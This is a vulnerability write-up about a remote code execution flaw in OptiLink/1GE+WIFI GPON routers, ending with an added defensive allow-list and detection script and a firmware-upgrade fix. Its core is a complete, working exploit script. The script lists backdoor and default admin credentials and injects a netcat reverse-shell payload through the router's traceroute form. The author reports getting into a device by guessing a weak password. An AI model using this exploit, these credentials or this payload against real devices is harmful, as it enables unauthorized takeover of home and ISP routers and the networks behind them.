0x01 Vulnerability Description

- 1GE+WIFI Router Remote Code Execution Vulnerability -

The 1GE+WIFI router has a command execution vulnerability. An attacker who logs in to the management backend with weak credentials can then execute commands remotely.

0x02 Vulnerability Verification

The page title identifies the device as the 1GE+WIFI router management interface.

A brute-force / weak-password login attempt against the web interface yielded the credentials admin/admin.

Searching www.exploit-db.com for the keyword 1GE turns up a remote command execution script for this device.

Script source:

# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
# Date: 23/03/2021
# Exploit Authors:  Developed by SecNigma and Amal.
# Vendor Homepage:  https://optilinknetwork.com/
# Version: ONT1GEW V2.1.11_X101 Build.1127.190306
# Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above,
# as they do not release the firmware to the public for some unknown reason.
# Additional notes:
# Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306.
# Device Name: ONT1GEW
# Software Version:  V2.1.11_X101
# Build Information: Build.1127.190306
# Chances are that XPONs of C-DATA company are affected too.
# Our research indicated that Optilink devices are just a rebranded version of C-Data.
# This exploit was tested on the following configuration.

#!/usr/bin/python3

import requests
import argparse
import re

def is_login_success(r):
    match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text)
    if match:
        return match

# Default configuration
# Router address   = 192.168.101.1
# LPORT            = 9001
# Default Username = e8c  / Backdoor     /
# Default Password = e8c /  Credentials /

parser= argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP")
parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")
parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router")
parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router")
args = parser.parse_args()

target=args.target,
lhost=args.lhost,
lport=args.lport,
user=args.user,
passw=args.passw

# e8c:e8c are the backdoor administrator creds to Optilink devices
# Alternate backdoor credentials are  adsl:realtek, admin:admin.
user2="e8c"
passw2="e8c"

home_url="http://"+target[0]+"/boaform/admin/formLogin"

print("[+] Trying to authenticate...")

# Authenticate ourselves first
data={'username':user, 'psd':passw}
r=requests.post(home_url,data)

res=is_login_success(r)
if res:
    print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"")
    print("[-] Exploit failed with the following error:")
    print(res)
    print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?")
    val = input("Press y or n : ")
    if val[0].lower()=="y":
        print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"")
        # Authenticate ourselves with new creds
        data={'username':user2, 'psd':passw2}
        r=requests.post(home_url,data)
        res2=is_login_success(r)
        if res2:
            print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"")
            print("[-] Exploit failed with the following error:")
            print(res2)
            print("[-] Halting Execution.")
            exit()
    else:
        print("Received input "+val+"")
        print("[-] Halting Execution.")
        exit()

print("[+] Looks like authentication was succesful!")
print("[+] Trying to fetch the WAN Name...")

# Fetching Wan Name
# wan_name="1_INTERNET_R_VID_***"
get_wan_url = "http://"+target[0]+"/diag_ping.asp"
r=requests.get(get_wan_url)
match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text)
wan_name=match[0]

print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..")
print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*")
print("[+] If everything went right, you should've gotten a shell right now!")

# Starting Exploitation
# The same vulnerability exists in formPing and formTracert.
# exploit_url = "http://"+target[0]+"/boaform/admin/formPing"
exploit_url = "http://"+target[0]+"/boaform/admin/formTracert"
# Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :)
# BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it.
# The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload.
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"'
r=requests.post(exploit_url,post_data)

Running the script yields a shell on the target device.

0x03 Vulnerability Fix

  1. Upgrade the router to Build.1653.210425 or later.
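The root cause visible in the script above is that the target_addr field of formPing / formTracert is interpolated into a shell command unchecked. The following is an added defender-side example, not part of the original post or the exploit-db script: it shows the allow-list check the firmware should apply to target_addr, and uses the same check to flag injection attempts in request bodies sent to those two handlers. The endpoint paths and field names come from the script; the sample POST bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Diagnostic handlers named in the exploit-db script; both hand target_addr to a shell.
VULN_ENDPOINTS = ("/boaform/admin/formPing", "/boaform/admin/formTracert")
# Allow-list: a dotted-quad IPv4 address or a plain DNS hostname (IPv6 deliberately not accepted).
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{_OCTET}(?:\.{_OCTET}){{3}}|{_LABEL}(?:\.{_LABEL})*)$")
# Shell metacharacters that never belong in a ping/traceroute target.
SHELL_META = re.compile(r"[`;|&$<>(){}\"'\s]")

def is_safe_target(value: str) -> bool:
    """The check the firmware should apply before interpolating target_addr into a command."""
    return bool(HOST_RE.match(value))

def inspect_post(path: str, body: str) -> dict:
    """Classify one POST to the diagnostic handlers; returns the decoded target and a verdict."""
    if path not in VULN_ENDPOINTS:
        return {"relevant": False}
    fields = parse_qs(body, keep_blank_values=True)          # decodes '+' and %XX for us
    target = fields.get("target_addr", [""])[0].strip('"')  # the script wraps the value in quotes
    suspicious = bool(SHELL_META.search(target)) or not is_safe_target(target)
    return {"relevant": True, "target": target, "suspicious": suspicious}

# Constructed sample requests (not captured traffic): one benign, two injections, one unrelated.
SAMPLE_POSTS = [
    ("/boaform/admin/formTracert", "target_addr=8.8.8.8&waninf=1_INTERNET_R_VID_100"),
    ("/boaform/admin/formPing", 'target_addr="1.1.1.1+`id`"&waninf=1_INTERNET_R_VID_100'),
    ("/boaform/admin/formTracert", "target_addr=127.0.0.1%3bid&waninf=1_INTERNET_R_VID_100"),
    ("/boaform/admin/formLogin", "username=admin&psd=admin"),
]

def flag_injections(posts):
    """Return (path, decoded target) for every diagnostic POST whose target fails the allow-list."""
    hits = []
    for path, body in posts:
        verdict = inspect_post(path, body)
        if verdict.get("suspicious"):
            hits.append((path, verdict["target"]))
    return hits

if __name__ == "__main__":
    for path, target in flag_injections(SAMPLE_POSTS):
        print(f"[!] command injection attempt via {path}: target_addr={target!r}")
```

The same check run over a web-server access log or a WAF rule for these two paths gives a detection for the exploit pattern; the fix itself is the vendor firmware upgrade listed below.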
